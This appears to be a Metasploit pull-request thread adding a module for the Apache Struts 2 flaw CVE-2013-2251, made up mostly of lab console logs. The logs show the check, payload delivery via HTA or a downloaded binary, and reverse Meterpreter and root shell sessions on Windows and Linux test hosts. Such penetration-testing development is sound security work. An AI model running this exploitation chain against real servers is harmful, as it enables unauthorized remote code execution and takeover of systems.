Add module for CVE-2013-2251

[jvazquez-r7]

Uses a different exploitation technique than other available struts exploits to avoid chars restrictions.

Tested on Struts 2.3.15 on Windows 2003 SP2 and Ubuntu 10.04:

msf exploit(struts_poc) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(struts_poc) > check
[+] The target is vulnerable.
msf exploit(struts_poc) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Target autodetection...
[+] 192.168.172.136:8080 - Windows target found!
[*] 192.168.172.136:8080 - Encoding payload into vbs/javascript/hta...
[*] 192.168.172.136:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.136:8080 - Execute payload through malicious HTA...
[*] 192.168.172.136:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.136:8080 - Sending the payload to the server...
[*] Sending stage (751104 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1188) at 2013-07-24 08:48:20 -0500
[-] Failed to delete C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jprh.exe
[!] This exploit may require manual cleanup of: jprh.exe

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(struts_poc) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(struts_poc) > set RHOST 192.168.172.166
RHOST => 192.168.172.166
msf exploit(struts_poc) > set RPORT 8080
RPORT => 8080
msf exploit(struts_poc) > check
[+] The target is vulnerable.
msf exploit(struts_poc) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.166:8080 - Target autodetection...
[+] 192.168.172.166:8080 - Linux target found!
[*] 192.168.172.166:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.166:8080 - Downloading payload to /tmp/SNPptJQOGx...
[*] 192.168.172.166:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.166:8080 - Sending the payload to the server...
[*] 192.168.172.166:8080 - Make payload executable...
[*] 192.168.172.166:8080 - Execute payload...
[*] Sending stage (36 bytes) to 192.168.172.166
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.166:34472) at 2013-07-24 08:49:16 -0500
[!] This exploit may require manual cleanup of: /tmp/SNPptJQOGx

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 2? [y/N]  y

[Meatballs1]

No Java target? :)

[wvu]

Testing!

[wvu]

Latest commit fixes the following error:

[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

Thanks, @jvazquez-r7!

[wvu]

Tested successfully! @wchen-r7 tested, too.